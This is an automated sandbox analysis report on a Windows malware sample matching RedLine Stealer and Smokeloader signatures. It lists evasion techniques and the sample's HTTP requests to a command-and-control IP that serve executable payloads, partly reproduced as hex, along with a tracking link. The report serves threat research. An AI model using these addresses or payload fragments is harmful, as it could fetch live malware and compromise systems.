Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zSmMqGGeVy.exe

Overview

General Information

Sample name:zSmMqGGeVy.exe
renamed because original name is a hash value
Original sample name:83aa26bd8755e994141c4b6d525307ba.exe
Analysis ID:1578937
MD5:83aa26bd8755e994141c4b6d525307ba
SHA1:1cc2485520840247010cd5a2a6f6ba69924a8da5
SHA256:0e5c004b6ac8fd180951d14352e8eb0e4b9b3d4e32dbeaa194a7af7c77d3b4d7
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • zSmMqGGeVy.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\zSmMqGGeVy.exe" MD5: 83AA26BD8755E994141C4B6D525307BA)
    • WerFault.exe (PID: 6320 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1430:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: zSmMqGGeVy.exeAvira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exeReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: zSmMqGGeVy.exeReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: zSmMqGGeVy.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004034C0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E93727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_00E93727
Source: zSmMqGGeVy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EA5F6E FindFirstFileExW,0_2_00EA5F6E
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:55:07 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:55:10 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 185.156.73.23 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloadW
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
Source: zSmMqGGeVy.exe, 00000000.00000003.2082365106.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2177142307.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2210483154.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2121506403.0000000005743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download5
Source: zSmMqGGeVy.exe, 00000000.00000002.2600972070.0000000005743000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
Source: zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
